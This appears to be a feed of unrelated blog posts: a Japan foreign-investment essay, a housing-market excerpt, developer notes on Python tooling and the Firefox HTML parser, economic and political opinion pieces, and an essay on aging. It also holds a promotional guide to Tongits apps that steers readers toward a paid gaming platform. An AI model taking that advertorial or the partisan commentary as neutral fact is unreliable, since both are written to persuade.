From the late 1960s through the early 1970s, Japan significantly liberalized its restrictions on FDI. There were still many institutional barriers to foreign acquisitions, mostly resulting from a combination of Japan’s financial and corporate governance systems, and from cultural resistance. But although foreign companies should, in theory, have had an easier time making greenfield investments from the 1970s onward, few took the plunge. There are lots of possible reasons for this — force of habit, regulatory differences between countries, cultural differences, and a general stereotype of Japan as a protectionist economy. But the most important reason was probably that unlike China, Poland, or Malaysia, Japan simply didn’t try to actively encourage foreign companies to use it as a production base.

Since 2003, though, the situation has slowly changed. Former Prime Minister Koizumi Junichiro called for more FDI into Japan. Regulations were eased a bit, and tax incentives were put in place. These efforts were minor and halting at first, but have gathered strength over time. Targets have become much more ambitious — in 2023 the government set a goal of attracting 100 trillion yen of FDI (about $690 billion as of this writing) by 2030. Politicians now talk regularly about the need to boost FDI. Immigration laws have been changed to make it much easier for skilled professionals to get permanent residency. There is a new Council for the Promotion of Foreign Direct Investment in Japan, and various other government efforts to attract FDI.

And amazingly, the plan seems to be working. In 2022, net FDI inflows to Japan were very slightly greater as a proportion of the economy than in either China or South Korea:

And encouragingly, greenfield FDI seems to be powering this rise. The number of inbound M&A deals has held steady, while greenfield projects have soared:

Source: JETRO

And since the semiconductor industry accounts for most of this new greenfield investment, it’s likely that a significant amount of it will result in exports.

But although this is good progress, Japan could do a lot more on the FDI front. First of all, 1.1% of GDP per year is a big improvement, but it’s not really big enough to be transformational — Poland gets over 5%, France gets 3.8%, and the U.S. gets 1.5%.

Second, most of Japan’s greenfield FDI is in one single industry — semiconductors. If Japan could attract similar levels of investment in other sectors, it would be insured against a sudden downturn in the chip industry, and it would have the chance to build up its technological muscle along a wider front. There are plenty of other high-value industries where Japan could be a high-tech, low-cost production platform — aerospace, biopharma, batteries, and electronics being four obvious examples.

In other words, Kumamoto, Sakana AI, and the other examples above are an important proof of concept for a golden age of Japanese FDI, but they should be only the beginning.

Why do foreigners invest in Japan?

Traditionally, the reason a few foreigners wanted to invest in Japan — either through greenfield investments or M&A — was to tap the large and lucrative Japanese market. That motivation still remains to some extent, but it’s growing weaker every day. Yet there are a number of reasons Japan is increasingly attractive as an export platform. Understanding these reasons is absolutely crucial for Japanese government officials and businesspeople who want to attract more FDI — if you’re selling something, you must understand why your customers want to buy it.

The most obvious selling point is the weak yen. A cheap Japanese currency makes anything produced in Japan more competitive in world markets. On top of that, decades of stagnant real wages have a silver lining — they’ve made Japan’s skilled workforce look relatively cheap. A third strong point is Japan’s deep network of high-quality suppliers.

There’s also the national security angle. As China’s foreign policy has become more aggressive, the U.S. and other developed nations have begun trying to move their supply chains out of China. The U.S. government calls this “friendshoring”, while companies call it “de-risking”, but the principle is the same — no one wants to be caught dependent on Chinese manufacturers for critical high-tech products if a war breaks out. Japan is an obvious alternative production base — it’s smaller and more expensive than China, but infinitely more secure. And unlike China, Japan will not use espionage to steal foreign companies’ intellectual property.

Even Germany, which has traditionally been more willing than other Western countries to invest in China, is beginning to get nervous; a significant number of German companies are looking to switch to Japan. And the U.S. Department of Defense is planning to develop advanced weapons in Japan, as well as manufacturing more traditional munitions there.

Yet another advantage — which Japanese people may not fully appreciate, since they’ve never had to deal with the alternative — is Japan’s efficient government. In many Western countries, environmental review laws and other poorly crafted regulations have turned land use into a nightmare — projects that pass all relevant environmental and safety regulations still have to endure years of lawsuits and court-enforced paperwork, making it hellishly expensive and time-consuming to build factories. The U.S., the UK, and other anglophone countries, which rely on the courts to adjudicate environmental regulation, have become especially hostile to development.

Japan’s more sensible and efficient system, which relies more on bureaucrats than on the court system, preserves some role for community input, but allows construction projects to be approved in a timely manner. Japan’s willingness to build, meanwhile, has left it with plenty of high-quality infrastructure — and the ability to create more quickly to suit the needs of foreign investors if necessary.

But there’s one more huge reason that foreigners want to invest in Japan, which could ultimately be more important than all the rest combined. And it’s a factor that, in my experience, very few Japanese people — including the government officials tasked with promoting FDI — yet appreciate.

The key is that people around the world really love Japan, and want to live there.

(In Part III, I’ll explain why so many people in the world want to live and work in Japan — and how Japan can leverage this soft power to supercharge its FDI sector.)



Best Free Tongits Game Online Platforms for 2025

Tongits has long been a pillar of Filipino card culture. With the rise of digital gaming, this traditional pastime has found a natural home online. Tongits game online platforms now let players enjoy the game without needing to gather around a physical table.

Online play provides convenience and introduces flexibility. Players can engage in quick matches, practice hand management repeatedly, and experiment with strategies at their own pace.

Beginners benefit from in-app tutorials and interactive hints, while seasoned players can sharpen their timing and observation skills. The freedom to pause, resume, or join new tables at will makes online Tongits more adaptable than ever.

Many platforms are free-to-play, lowering the barrier for newcomers and providing consistent practice opportunities for veterans. Social features such as chat, clubs, and gifting systems help recreate the communal feel of traditional games.

Whether you’re looking to practice, compete casually, or engage with a broader community, online platforms make Tongits accessible and enjoyable for everyone.

Below are three leading free Tongits game online platforms in 2025, each designed to offer a unique balance of gameplay, strategy, and social interaction.

Tongits Go: The Most Popular Tongits Game Online

Tongits Go emphasizes social interaction while offering a wide variety of games. Designed for players who enjoy dynamic sessions, it blends fast matchmaking with community features that make every match engaging.

Its colorful interface, live chat, and club system create a social environment reminiscent of traditional card tables.

Beyond Tongits itself, Tongits Go provides additional card, casual, and classic games. The platform encourages exploration, allowing players to try multiple game types without leaving the app.

Quick matches and responsive controls make the app suitable for both short breaks and extended sessions.

Tongits Go Games
  • Card Games: Tongits, Super Tongits, Pusoy, OFC (Open-Face Chinese), Poker, Pusoy Dos, Lucky 9, 8 Rummy
  • Casual Games: Joker, Sabong, Pool, Mines, Crash, Slots
  • Classics & Others: Mahjong

The app also supports gradual skill development. Fast-paced gameplay, combined with immediate feedback, helps players learn hand management, timing, and strategy through repetition.

Achievements and seasonal events provide incentives to continue playing regularly, keeping the experience fresh and rewarding even without spending money.

For players seeking a mix of social engagement and flexible online gameplay, Tongits Go offers a lively and comprehensive Tongits game online environment.

Tongits Star: A Competitive Alternative

Tongits Star is tailored for players who prioritize strategy and skill. Its clean, minimal interface allows users to focus on gameplay without distractions.

Responsive controls and carefully curated game modes reinforce a competitive experience where observation and timing are critical.

Rather than offering a broad selection of games, Tongits Star features a focused lineup that supports long-term skill development.

By providing leaderboards and ranking systems, the app lets players measure improvement over time, rewarding consistent performance over luck.

This makes Tongits Star ideal for methodical players who enjoy testing and refining their strategies.

Tongits Star Games
  • Card Games: Tongits, Pusoy, Remi, Poker, Pusoy Dos, Lucky 9
  • Casino-Style Games: Bingo, Sicbo, Joker, Slots, Mines, Crash
  • Casual/Skill Games: 8 Ball

The app’s free-to-play model ensures that progression is determined by skill, not spending. Players can focus on improving decision-making, predicting opponents’ moves, and maintaining strategic consistency.

By combining a competitive structure with a distraction-free interface, Tongits Star delivers a refined Tongits game online experience for those who value mastery.

Tongits ZingPlay: A Straightforward Option

Tongits ZingPlay takes a minimalist approach, emphasizing the game itself rather than additional features.

Its interface is clean, the pacing deliberate, and the controls precise, creating an experience that mirrors traditional play while benefiting from digital convenience.

This simplicity makes ZingPlay particularly effective for practice. Players can focus on reading discards, anticipating opponent moves, and managing risk without distractions.

Beginners can learn foundational strategies, while experienced players can enjoy uninterrupted matches that reward attention and timing.

Core Features of ZingPlay

  • Classic Tongits gameplay
  • Minimalist interface for focus
  • No flashy bonuses or extraneous menus

By stripping down the interface and maintaining gameplay integrity, ZingPlay demonstrates that online Tongits can remain engaging and skill-driven, proving that sometimes less truly is more.

Want a Competitive Tongits Game Online? Play on GameZone.

GameZone elevates Tongits online by combining professional management, real-time matches, and a secure gaming environment.

Players can enjoy Tongits alongside Filipino favorites like Pusoy and Color Game while benefiting from structured matchmaking and fair play systems.

The platform integrates responsible gaming features such as time limits, deposit controls, and self-exclusion options.

Community features and organized events help maintain engagement, transforming casual play into an ecosystem where progress, connection, and competition coexist.

Whether players are practicing, competing, or socializing, GameZone ensures that the experience is balanced, culturally authentic, and enjoyable.

It offers a natural next step for those ready to move beyond free apps and into a professionally managed Tongits game online environment.

GameZone isn’t just about winning matches but about embracing the culture of Filipino card games in a modern space. Whether you’re honing skills, connecting with friends, or exploring new strategies, the platform makes every session meaningful.

Online Tongits has evolved into more than a pastime; it’s now a community, a classroom, and a stage for strategic play, all rolled into one.

FAQs

Q: What does “Tongits game online” mean?

A: It refers to digital platforms where Tongits is played over the internet, allowing players to compete in real time using mobile or online applications.

Q: What is the objective of Tongits?

A: The goal is to reduce your hand through valid melds or call “Tongits” when your remaining cards give you an advantage.

Q: Is Tongits Go free to play?

A: Yes. Tongits Go allows players to join matches without payment, with optional in-app purchases available.

Q: What type of players is Tongits Star best for?

A: Tongits Star is ideal for players who enjoy competitive play, rankings, and strategy-focused matches.

Q: Are Tongits game online apps safe to use?

A: Reputable platforms offer secure systems and fair play mechanisms, especially professionally managed environments like GameZone.

Q: Where can I play Tongits online competitively?

A: GameZone provides real-time Tongits matches in a structured environment alongside other Filipino card games.



The post Best Free Tongits Game Online Platforms for 2025 appeared first on DCReport.org.

3rd Look at Local Housing Markets in November

Today, in the Calculated Risk Real Estate Newsletter: 3rd Look at Local Housing Markets in November

A brief excerpt:
First, California reports seasonally adjusted sales and some measures of inventory. From the California Association of Realtors® (C.A.R.): California home sales reach three-year high in November, C.A.R. reports
Sales increased 1.9 percent from October, rising from 282,590 to 287,940 in November. Compared with a year earlier, November sales were up 2.6 percent from a revised 280,530.
Closed Existing Home Sales: In November, sales in these markets were down 7.1% YoY. Last month, in October, these same markets were up 1.5% year-over-year, Not Seasonally Adjusted (NSA).

Important: There was one fewer working day in November 2025 (18) than in November 2024 (19). So, the year-over-year change in the headline SA data will be more than the change in the NSA data (there are other seasonal factors).
...
Several local markets - like Illinois, Miami, New Jersey and New York - will report after the NAR release.
There is much more in the article.
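As a quick sanity check, the percentage changes in the C.A.R. excerpt can be reproduced from the quoted sales figures — a minimal sketch using only the numbers above:

```python
# Sanity-check the C.A.R. percentage changes quoted in the excerpt.
oct_2025 = 282_590   # October 2025 sales (seasonally adjusted annualized rate)
nov_2025 = 287_940   # November 2025 sales
nov_2024 = 280_530   # revised November 2024 sales

mom = (nov_2025 / oct_2025 - 1) * 100  # month-over-month change
yoy = (nov_2025 / nov_2024 - 1) * 100  # year-over-year change
print(f"{mom:.1f}% MoM, {yoy:.1f}% YoY")  # → 1.9% MoM, 2.6% YoY
```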

Poe the Poet

I was looking for a way to specify additional commands in my pyproject.toml file to execute using uv. There's an enormous issue thread on this in the uv issue tracker (300+ comments dating back to August 2024) and from there I learned of several options including this one, Poe the Poet.

It's neat. I added it to my s3-credentials project just now and the following now works for running the live preview server for the documentation:

uv run poe livehtml

Here's the snippet of TOML I added to my pyproject.toml:

[dependency-groups]
test = [
    "pytest",
    "pytest-mock",
    "cogapp",
    "moto>=5.0.4",
]
docs = [
    "furo",
    "sphinx-autobuild",
    "myst-parser",
    "cogapp",
]
dev = [
    {include-group = "test"},
    {include-group = "docs"},
    "poethepoet>=0.38.0",
]

[tool.poe.tasks]
docs = "sphinx-build -M html docs docs/_build"
livehtml = "sphinx-autobuild -b html docs docs/_build"
cog = "cog -r docs/*.md"

Since poethepoet is in the dev dependency group, any time I run uv run ... it will be available in the environment.
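Poe the Poet also supports composing tasks into sequences. As a sketch (the fresh-docs task name is hypothetical, building on the cog and docs tasks defined above), you could regenerate the cog output and then rebuild the HTML docs in one step:

```toml
[tool.poe.tasks]
# Hypothetical sequence task: run the existing "cog" and "docs" tasks in order
fresh-docs = ["cog", "docs"]
```

Running uv run poe fresh-docs would then execute both steps back to back.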

Tags: packaging, python, s3-credentials, uv

Being a Huge Asshole Is Not Good Politics

Official White House Photo by Daniel Torok


President Trump has a big problem. Every president has ups and downs and has to confront situations not entirely of their making. The successful ones create a stock of good will they can draw on when things are not going great, so the public will trust them enough to be patient while we wait for things to turn around.

The trouble Trump has is that he’s an absolutely terrible human being in every way, and while he has always had a unique kind of charisma and a keen radar for people’s darkest impulses, both of those qualities are beginning to erode as he ages rapidly and becomes more erratic. The worst parts of himself are becoming only more vivid.

It’s going to be increasingly visible in all kinds of ways, but for now let’s focus on two examples. Here’s today’s economic news, as we got both the November jobs numbers and the October numbers that were delayed by the government shutdown:

The U.S. unemployment rate rose to 4.6% in November, its highest in more than four years, fueling questions about the American economy’s underlying strength.

A long-delayed government report on Tuesday showed that 64,000 jobs were gained in November, while 105,000 jobs were lost in October.

The unemployment rate in November rose to 4.6%, from 4.4% in September, the last month the Labor Department had reported the unemployment rate.

Job losses in June, August and October mean the U.S. economy has shed jobs in three out of the past six months.

That’s very bad. Nobody knows for sure if it will get worse, but the reaction from the White House — which works hard to channel Trump in both style and substance in every utterance it makes — was this:

Woo hoo! Yeah baby! The bad news is actually good, and also, immigrants suck!

You’ll remember that Joe Biden and his aides were scolded endlessly for trying to find silver economic linings when inflation was high in 2022 and 2023, but the difference is that there actually was plenty of good news back then, especially in job growth. Over 16 million jobs were created in Biden’s term, a record unmatched in American history. What the administration tried to do then was to point to what was good, but also acknowledge people’s lived experience; every time they said anything about the economy, it would start with “We know people are struggling, and prices are too high. But we’re working every day…”

Trump is simply not capable of that — and if he ever was, he certainly isn’t now. His aides can write a speech for him that includes some empathetic notes, but he will inevitably go off-script to ramble on about how people’s feelings are not real and it’s all a hoax.

If you are actually having trouble making ends meet, Trump is telling you you’re a sucker, that you’re too dumb to see through the lies Democrats tell. That’s profoundly insulting. It shows that he doesn’t give a crap about you, because all he cares about is whether some piece of news reflects well or poorly on himself, and if it’s the latter, it must be a lie or somebody else’s fault.

It’s not that the right expressions of empathy and clever spin can neutralize the political harm the president will endure when the economy does poorly, but at least one can avoid making things worse. Which Trump can’t.

Example #2: Rob Reiner’s death

When Trump learned that Rob Reiner and his wife Michele had been murdered, he didn’t stop and consider what the most appropriate response might be, whether on a political or a human level. He reacted on impulse, and since his worldview is that people who like him are good and people who don’t like him are bad, he sent this repugnant message out on his social media platform:

You don’t have to read between the lines to understand that if Reiner was murdered because he had criticized Trump (which of course is not what happened), then as far as Trump is concerned, his murder was a good thing. But since Trump is now in a weakened political state, a bunch of Republicans scolded him publicly over it, something that few have had the courage to do in the past.

Even when he was offered the chance to explain, he couldn’t bring himself to say what any decent human being would, something like “We had our political differences, but obviously it’s a tragedy for their family and friends.” Instead, he said, “I wasn’t a fan of his at all. He was a deranged person as far as Trump is concerned.”

If anyone says “But liberals celebrated Charlie Kirk’s murder!”, I’d ask, which liberals specifically? A nurse in Sheboygan? A plumber in Billings? Yes, there were people who sent out variants of He had it coming to their 75 Facebook friends. Hundreds of them lost their jobs for expressing that sentiment, or even milder ones. But I didn’t see a single Democratic politician describe Kirk’s death as anything but a tragedy. And Trump isn’t just some random person, he’s the president of the United States. He’s supposed to show some class at a moment like that, but he can’t.

Again, this is not an intentional strategy; Trump is just a terrible person in every way, and he’s incapable of even pretending to have any virtues. But at least the pretense of virtue is something we want in a president, and we especially want it when dark things happen. As crude as it might be to acknowledge, tragedy creates a political opportunity for leaders who can rise to the moment. Think of Ronald Reagan addressing the country after the Challenger disaster, or George W. Bush vowing vengeance atop the rubble of the World Trade Center (and yes, that didn’t turn out too well, but at the time, it was exactly what most Americans wanted to hear).

Being a huge asshole has produced some political dividends for Trump in the past, but it has become a liability. When Indiana Republicans decided not to redraw their district lines to eliminate every Democratic district as Trump had instructed them to do, a number of them told reporters it was precisely because the White House’s pressure campaign was so aggressive and ham-handed, and inevitably backed up by a wave of threats and even swatting attempts from Trump’s widely distributed army of chuds. One state senator who has a daughter with Down syndrome specifically cited Trump calling Minnesota Gov. Tim Walz “retarded” as a reason he refused to submit to Trump’s wishes.

Yes, there are certain portions of Trump’s base that are attracted to him not in spite of the fact that he’s a monster, but because of it. They love that he attacks the people they hate in crude and ruthless ways; they love his violent rhetoric; they love his racism and his misogyny. But those people have never been anything approaching a majority of the electorate.

To succeed, Trump has needed the support of millions of voters who tolerate the fact that he’s an awful human being because they thought they were getting something else out of the deal. He’d shake things up, he’d fight for the little guy, he’d make the economy hum. But when Trump is just a corrupt oligarch handing out favors to his rich friends, and he’s hurting the economy, and he’s making health care costs rise, and he’s insulting you and yours? Then the fact that he’s such an asshole no longer seems so unimportant.

Thank you for reading The Cross Section. This site has no paywall, so I depend on the generosity of readers to sustain the work I present here. If you find what you read valuable and would like it to continue, consider becoming a paid subscriber.


firefox parser/html/java/README.txt

TIL (or TIR - Today I was Reminded) that the HTML5 Parser used by Firefox is maintained as Java code (commit history here) and converted to C++ using a custom translation script.

You can see that in action by checking out the ~8GB Firefox repository and running:

cd parser/html/java
make sync
make translate

Here's a terminal session where I did that, including the output of git diff showing the updated C++ files.

I did some digging and found that the code that does the translation work lives, weirdly, in the Nu Html Checker repository on GitHub which powers the W3C's validator.w3.org/nu/ validation service!

Here's a snippet from htmlparser/cpptranslate/CppVisitor.java showing how a class declaration is converted into C++:

    protected void startClassDeclaration() {
        printer.print("#define ");
        printer.print(className);
        printer.printLn("_cpp__");
        printer.printLn();

        for (int i = 0; i < Main.H_LIST.length; i++) {
            String klazz = Main.H_LIST[i];
            if (!klazz.equals(javaClassName)) {
                printer.print("#include \"");
                printer.print(cppTypes.classPrefix());
                printer.print(klazz);
                printer.printLn(".h\"");
            }
        }

        printer.printLn();
        printer.print("#include \"");
        printer.print(className);
        printer.printLn(".h\"");
        printer.printLn();
    }

Here's a fascinating blog post from John Resig explaining how validator author Henri Sivonen introduced the new parser into Firefox in 2009.

Via Hacker News conversation

Tags: c-plus-plus, firefox, henri-sivonen, java, john-resig, mozilla

The new ChatGPT Images is here

OpenAI shipped an update to their ChatGPT Images feature - the feature that gained them 100 million new users in a week when they first launched it back in March, but has since been eclipsed by Google's Nano Banana and then further by Nano Banana Pro in November.

The focus for the new ChatGPT Images is speed and instruction following:

It makes precise edits while keeping details intact, and generates images up to 4x faster

It's also a little cheaper: OpenAI say that the new gpt-image-1.5 API model makes image input and output "20% cheaper in GPT Image 1.5 as compared to GPT Image 1".

I tried a new test prompt against a photo I took of Natalie's ceramic stand at the farmers market a few weeks ago:

Add two kakapos inspecting the pots

Outdoor craft market booth displaying handmade ceramics and jewelry on a navy tablecloth with "NATBAT CREATIONS CALIFORNIA USA" logo. Items include colorful glazed ceramic cups in blue, orange, and black; decorative bowls including a rainbow-striped piece; jewelry pendants and earrings on wooden display stands; ceramic plant markers in various colors labeled "Artichoke", "Cilantro", "Chili", "Oregano", "Potato", "Pumpkin", "Sage".

Here's the result from the new ChatGPT Images model:

Same craft market booth as previous image, now with two large olive-green Kākāpō parrots perched on the table among the ceramics, one investigating the blue glazed cups and the other examining an orange cup.

And here's what I got from Nano Banana Pro:

Same craft market booth with two Kākāpō now in different positions: one remains center-table peering into the ceramic cups near the rainbow pot, while the second has moved to the right edge of the table near the plant markers, appearing to examine or possibly chew on items at the table's corner. They are both a little smaller than in the first image.

The ChatGPT Kākāpō are a little chonkier, which I think counts as a win.

I was a little less impressed by the result I got for an infographic from the prompt "Infographic explaining how the Datasette open source project works" followed by "Run some extensive searches and gather a bunch of relevant information and then try again" (transcript):

Infographic titled "HOW DATASETTE WORKS" with subtitle "THE OPEN SOURCE DATA PLATFORM" showing a four-step workflow. STEP 1 (orange): "LOAD YOUR DATA" - "CSV, JSON, XLSX, SQLite, PostgreSQL, etc." with icons of file types flowing into a laptop. Below: "IMPORT DATASETS - Turn your structured data into SQLite databases and .db files." with checkmarks for "Datasette Desktop App for local deployment", "CLI tool for command-line imports", "Automatic CSV import tool". STEP 2 (green): "PUBLISH & DEPLOY" - "HOST DATASETS ONLINE" with cloud and server icons labeled "DEPLOY". Below: "SHARE ONLINE - Deploy your Datasette instance to a public server." with checkmarks for "Datasette Cloud - Free hosting service", "Deploy anywhere via plugins", "Configurable API tools". STEP 3 (purple): "EXPLORE & QUERY" - "BROWSE, SEARCH & VISUALIZE" with database and browser window icons. Below: "SQL QUERIES & SEARCH - Browse, filter, search, and visualize your data with an interactive web interface." with checkmarks for "Perform SQL queries directly from the browser", "Filter, sort, and facet data", "Generate custom visualizations and charts". STEP 4 (red): "BUILD & EXTEND" - "PLUGINS, APIS & INTEGRATIONS" with gear and wrench icons labeled "API". Below: "CUSTOMIZE & DEVELOP" with bullets "Develop custom plugins for added functionality", "Access JSON API for programmatic queries", "Embed and integrate Datasette into other applications". Bottom banner shows four features: "OPEN DATA PLATFORM - Widely used for visualizing, sharing and building applications with SQLite backed data", "EXTENSIBLE PLUGINS - 100+ plugins available, inc uding chaps, charts authentication, and more", "ACCESS CONTROL - Granular permissions for controlling who s an access and interact with your data", "OPEN SOURCE PROJECT - Actively developed open source project with a vibrant community of contributors".

See my Nano Banana Pro post for comparison.

Both models are clearly now usable for text-heavy graphics though, which makes them far more useful than previous generations of this technology.

Tags: ai, kakapo, openai, generative-ai, text-to-image, nano-banana

s3-credentials 0.17

New release of my s3-credentials CLI tool for managing credentials needed to access just one S3 bucket. Here are the release notes in full:

  • New commands get-bucket-policy and set-bucket-policy. #91
  • New commands get-public-access-block and set-public-access-block. #92
  • New localserver command for starting a web server that makes time limited credentials accessible via a JSON API. #93

That s3-credentials localserver command (documented here) is a little obscure, but I found myself wanting something like that to help me test out a new feature I'm building to help create temporary Litestream credentials using Amazon STS.

Most of that new feature was built by Claude Code from the following starting prompt:

Add a feature s3-credentials localserver which starts a localhost weberver running (using the Python standard library stuff) on port 8094 by default but -p/--port can set a different port and otherwise takes an option that names a bucket and then takes the same options for read--write/read-only etc as other commands. It also takes a required --refresh-interval option which can be set as 5m or 10h or 30s. All this thing does is reply on / to a GET request with the IAM expiring credentials that allow access to that bucket with that policy for that specified amount of time. It caches internally the credentials it generates and will return the exact same data up until they expire (it also tracks expected expiry time) after which it will generate new credentials (avoiding dog pile effects if multiple requests ask at the same time) and return and cache those instead.
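The caching-with-expiry behaviour that prompt describes can be sketched in a few lines. This is a minimal sketch, not the actual s3-credentials implementation; `generate` is a hypothetical callable standing in for the real STS call:

```python
import threading
import time

class CredentialCache:
    """Cache time-limited credentials, regenerating only after expiry.

    `generate` is a placeholder for the real credential call; it must
    return a tuple of (credentials_dict, lifetime_in_seconds).
    """

    def __init__(self, generate):
        self.generate = generate
        self.lock = threading.Lock()  # serializes regeneration (no dog-pile)
        self.cached = None
        self.expires_at = 0.0

    def get(self):
        # Only one caller regenerates; concurrent callers wait on the
        # lock and then reuse the freshly cached result.
        with self.lock:
            if self.cached is None or time.monotonic() >= self.expires_at:
                creds, lifetime = self.generate()
                self.cached = creds
                self.expires_at = time.monotonic() + lifetime
            return self.cached
```

Before expiry every request gets the identical cached payload; once the tracked expiry time passes, the next request (and only that one) triggers regeneration.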

Tags: aws, projects, s3, ai, annotated-release-notes, s3-credentials, prompt-engineering, generative-ai, llms, coding-agents, claude-code

ty: An extremely fast Python type checker and LSP

The team at Astral have been working on this for quite a long time, and are finally releasing the first beta. They have some big performance claims:

Without caching, ty is consistently between 10x and 60x faster than mypy and Pyright. When run in an editor, the gap is even more dramatic. As an example, after editing a load-bearing file in the PyTorch repository, ty recomputes diagnostics in 4.7ms: 80x faster than Pyright (386ms) and 500x faster than Pyrefly (2.38 seconds). ty is very fast!

The easiest way to try it out is via uvx:

cd my-python-project/
uvx ty check

I tried it against sqlite-utils and it turns out I have quite a lot of work to do!
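As an illustration (my own toy example, not one from sqlite-utils), the bread-and-butter mismatch a checker like ty reports is an annotation that disagrees with what the code actually returns:

```python
def word_count(text: str) -> int:
    # A static type checker flags this line: the annotation promises
    # an int, but the function actually returns a str.
    return str(len(text.split()))

# Python doesn't enforce annotations at runtime, so the bug only
# surfaces when something downstream expects an int:
result = word_count("a quick test")
print(type(result).__name__)  # prints "str"
```

Running `uvx ty check` over a file like this reports the mismatch without ever executing the code.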

Astral also released a new VS Code extension adding ty-powered language server features like go to definition. I'm still getting my head around how this works and what it can do.

Via Hacker News

Tags: python, vs-code, astral

I'm not budging

It is often best to leave well enough alone.

Throughout human history, there have been many golden ages. But none was anywhere near as golden as the end of the second millennium. The world saw its greatest economic boom in the late 20th century, and this dramatically reduced the share of the population suffering from extreme poverty. The proximate cause of this boom was economic reforms in many countries, most notably China, India and Eastern Europe, but also including places such as Australia, New Zealand, Chile, Panama and the Dominican Republic. In terms of human welfare (and what else matters?), the neoliberal boom is by far the best thing that ever happened:

In my own field of economics, a “Washington Consensus” was reached that industrial policies do not work and that free market reforms were the way to go. Between 1990 and 2000, six Nobel Prizes in Economics went to professors at the University of Chicago, a hotbed of free market economics.

In the field of macroeconomics, things had never been better. The profession had largely moved away from outdated Keynesian ideas such as using fiscal policy to stabilize the business cycle, or the myth that monetary policy was ineffective at the zero lower bound. Western economists were highly critical of the Bank of Japan for not doing enough monetary stimulus to escape from deflation, dismissing BOJ claims that it was powerless to act. Fiscal austerity was in style, and indeed the US ran three consecutive budget surpluses at the end of the millennium.

Of course, things were not perfect. Although the famous “China Shock” paper argued that trade with China was beneficial to the US in an overall sense, the authors also showed that many local communities were adversely affected. Unfortunately, people cannot leave well enough alone. Just when economic scholars and policymakers had mostly figured things out, we got restless and began reverting to all the mistakes of the mid-20th century. Here are just a few examples:

  1. Economists began to doubt the efficacy of monetary policy, especially at the zero lower bound.

  2. Economists began to forget about monetary offset of fiscal policy.

  3. Economists began to suggest that budget deficits don’t matter when interest rates are low. (But what if they don’t stay low?)

  4. Economists increasingly cited interest rates as an indicator of the stance of monetary policy. (They are not.)

  5. Economists began edging back toward discredited Phillips Curve theories that favor easy money as a way to create jobs.

  6. Economists found strange new respect for previously discredited policies such as price controls and protectionism, at least in limited cases.

  7. Economists began to revert to discredited theories that antitrust officials needed to worry about low prices, not high prices.

  8. Some economists began to question whether the Fed was even able to target inflation, as various fiscal theories of the price level became popular on both the left and the right, despite almost no empirical support.

It is difficult to disentangle cause and effect. Did the changing views of economists cause a deterioration in public policy? Were opportunistic economists trying to cash in on a change in the prevailing sentiment of policymakers? Or were both responding to a change in the zeitgeist?

Whatever the explanation, we began to see more advocacy of policies such as government ownership of formerly private business, the increased use of rent controls, and Wright-Patman style anti-trust regulation. There was a rise in protectionism. After the mid-2010s, we implemented reckless and unsustainable fiscal deficits.

Unlike during previous periods of American history, this was mostly an unforced error. No world war or Great Depression made big deficits inevitable. We did this to ourselves.

It has become fashionable to reject neoliberalism, but the arguments against it are quite weak. In almost every case, the more neoliberal economy does better than the otherwise similar less neoliberal economy. Similarly, arguments against circa 2005 monetary theory are quite weak.

By the early 2000s, the Fed had adopted a very effective monetary regime, which kept inflation close to 2%. The Fed had a small balance sheet, with liabilities that were 98% composed of currency. The asset side of the balance sheet was almost entirely Treasury securities. And then in 2008 we threw it all away, with a completely unnecessary policy of paying interest on bank reserves. This led to a massively bloated Fed balance sheet, which allowed our central bank to intervene much more aggressively in the credit markets.

Call me a grouchy old reactionary, but I’m not budging. The policy consensus of 20 years ago was far superior to the policy consensus of today. In my view:

  1. Fiat money central banks can always boost nominal GDP, if they choose to do so. They can also restrain inflation, if they choose to do so.

  2. We should not pay interest on bank reserves.

  3. We should not use fiscal stabilization policy.

  4. We should balance the budget, at least in real terms.

  5. We should have free trade with countries that don’t invade their neighbors.

  6. Anti-trust should focus on high prices, not low prices.

  7. We should avoid so-called industrial policies. (Check out Richard Hanania’s post on the subject.)

  8. We should avoid rent controls, price controls and government ownership of business.

  9. We should end residential zoning restrictions and move toward school choice, health savings accounts, carbon taxes, congestion pricing and progressive consumption taxes.

At the end of the last millennium the world had finally figured it out, and then . . .

Skateboarding at 90

If you were a rock’n’roller in the ’70s, you’ll remember a song by Dr. Hook:

“…the thrill we’ve never known
Is the thrill that’ll get ya when you get your pitcha on the cover of the Rolling Stone”

WELL — I made it on the cover of my hometown newspaper on Saturday, November 29.

Peter Hartlaub, Culture Critic of the Chronicle, wrote the article after a Zoom interview and then a visit to the homestead along with photographers Benjamin Fanjoy and Ryan Curry. You never know how interviews will turn out, but this turned out to be a good one.

Here’s the article: https://archive.ph/akTJ8

It brought to mind Doc Ball, an older surfer, who wrote the book California Surfriders in 1946, which we all had in the ’50s (when we were surfing in Santa Cruz before wetsuits). Doc also skated in his later years, and I remember seeing a film of him skating in his 90s and thinking “Wow!”

Doc Ball skating in his 80s
Doc surfing at WindanSea in SoCal in the ’40s. Check out his board!

Here’s a film of Doc skating at age 92:

https://www.eos.surf/videos/video-doc-ball-skateboarding-at-age-92


Above: me skating last month at the bottom of the Bolinas-Fairfax road, with my Tangent board from Loaded Boards. This is a breakthrough board: stable, smooth, maneuverable. It rejuvenates my skating stoke. Every time I look at it, I want to roll. Thanks to Don and the boys at Loaded for keeping me rolling.

Thoughts on Aging

OK, so I’m doing things that not many 90-year-olds do, but it’s simply that I’ve kept at it. I think the baby boomers are going to have a large percentage of active older people.

By far the most popular post I’ve done here has been The Final Lap, or What It’s Like to Be 89. Now that I’m a year older, I’m planning another post on the subject, but here are a couple of random thoughts on the 10th decade.

It’s new territory. We’ve never been this old before. And sure, you could say the same thing for your 50s or 60s or 70s, but the difference now is that things are breaking down. I’m way weaker now than I was 25 years ago. Not as flexible. I wear hearing aids, have needed two tooth implants, depth perception not so good. Nature is trying to figure out how to take us down.

We have a lot more past than future.

There are fewer same-age compatriots with whom to share precious memories. Our semi-annual Lowell High School lunches now consist of 7 of us — last men standing.

With my friend Tony Serra about 10 years ago. We’ve known each other for over 70 years.

Resist much, obey little - Walt Whitman

Thanks for reading Live From California with Lloyd Kahn! This post is public so feel free to share it.

An A+++++ Economy, My A++

When Politico recently asked Donald Trump to grade the current U.S. economy, he replied “A-plus-plus-plus-plus-plus.” He made this boast at a time when actual economic data were still scarce, a consequence of the government shutdown that stopped or delayed key information about the state of the job market.

Yesterday the report on employment during the month of November finally arrived. And the message of the report on the state of the US economy was clear: A+++++ my A++. While it’s too soon to declare that we’re in a recession, the data are at least pre-recessionary: that is, the numbers are weak enough that we should be seriously worried that a recession is coming. And that’s a state of affairs completely at odds with Trump’s rose-colored — spray-tanned? — picture.

